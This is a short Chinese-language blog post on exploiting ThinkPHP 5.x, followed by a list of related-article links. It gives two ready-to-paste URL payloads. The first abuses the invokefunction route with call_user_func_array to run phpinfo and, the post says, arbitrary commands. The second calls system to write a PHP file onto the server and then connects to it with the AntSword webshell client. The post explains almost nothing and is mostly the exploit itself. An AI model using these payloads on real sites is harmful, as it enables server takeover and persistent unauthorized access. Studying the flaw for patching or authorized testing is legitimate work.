常见框架漏洞:Thinkphp(TP)篇

简介

ThinkPHP (简称 TP )是一款流行的 国产开源 PHP 框架 ,遵循 MVC(Model-View-Controller) 设计模式,以简洁、高效、灵活著称,广泛应用于国内中小型 Web 项目开发。

Thinkphp5x远程命令执行及getshell

原理

rce

过程

打开网站

复制代码
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1

在后面拼接指令即可

getshell

复制代码
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=echo "<?php phpinfo();?>" >>1.php

访问后使用蚁剑链接即可

相关推荐
汤米粥6 天前
FastAdmin和thinkPHP学习文档
学习·thinkphp·fastadmin
掘金归海一刀8 天前
thinkphp6+elementui实现多图片压缩包下载
前端·vue.js·thinkphp
网络研究院9 天前
2025 年 4 月补丁星期二预测:微软将推出更多 AI 安全功能
人工智能·安全·microsoft·漏洞·威胁·补丁
漫步企鹅21 天前
【漏洞修复】为了修复ARM64 Android10系统的第三方库漏洞,将ARM64 Android16的系统库直接拷贝到Android10系统如何?
android·漏洞·修复·系统库
晓翔仔1 个月前
利用 requestrepo 工具验证 XML外部实体注入漏洞
xml·网络安全·信息安全·渗透测试·漏洞
phper81 个月前
在 Docker 中为 ThinkPHP 项目安装 PHP Redis 扩展并解决 500 错误
redis·docker·php·thinkphp
fendouweiqian2 个月前
thinkphp think-captcha 前后端分离 图形验证码
thinkphp
渗透测试老鸟-九青2 个月前
基于Electron的应用程序安全测试基础 — 提取和分析.asar文件的案例研究
网络·数据仓库·hive·hadoop·安全·网络安全·漏洞
ETO_冬2 个月前
ThinkPHP使用phpword读取模板word文件并添加表格
服务器·word·php·thinkphp